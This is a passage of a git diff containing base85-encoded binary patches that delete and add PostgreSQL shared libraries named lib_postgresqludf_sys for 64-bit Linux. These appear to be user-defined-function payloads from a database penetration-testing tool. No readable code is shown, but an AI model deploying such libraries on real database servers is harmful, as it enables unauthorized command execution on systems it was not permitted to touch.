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
G{r?SX<~j2K

diff --git a/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..905e48886a57e81bd5b47280f85a08ac7a4ad1ab
GIT binary patch
literal 3086
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

literal 0
HcmV?d00001

diff --git a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so
deleted file mode 100755
index 80eec1a745ae896eccdd0270b6eb586da4adc8f9..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 7712
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
LzsoK}-Rb{tz4AD!

diff --git a/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
new file mode 100644
index 0000000000000000000000000000000000000000..bd5c1ceee19c583fc74564b0a607a5815e08b0bf
GIT binary patch
literal 3088
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

literal 0
